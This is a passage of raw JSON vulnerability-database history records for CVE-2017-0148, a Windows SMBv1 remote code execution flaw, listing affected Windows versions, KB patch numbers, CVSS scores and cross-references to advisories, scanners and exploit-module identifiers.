x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T00:58:24", "differentElements": ["msAffectedSoftware"], "edition": 60}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-19T08:49:10", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-19T08:49:10", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-19T08:49:10", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3177186", "KBMS16-110, 3187754", "KB3212646", "KB4013198", "KB4012215", "KB4012217", "KB4012213", 
"KB4013429", "KB3210721", "KB4012212", "KB4012606", "KB3213986", "KB3205409", "KB3210720", "KB4012216", "KB4012214", "KB4012598", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T08:49:10", "differentElements": ["msAffectedSoftware"], "edition": 61}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-19T10:51:44", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-19T10:51:44", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-19T10:51:44", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB4012216", "KB4012606", "KB3212646", "KB3177186", "KB4012213", "KB3205401", "KB4012598", "KB4012212", "KB3205409", "KB3210720", "KB4012217", "KB4012214", "KB3213986", "KB4013429", "KB4012215", "KB4013198", "KB3210721"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T10:51:44", "differentElements": ["msAffectedSoftware"], "edition": 62}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "3c8f710d7629e55dea40adfa20c8440d", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-19T14:49:48", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 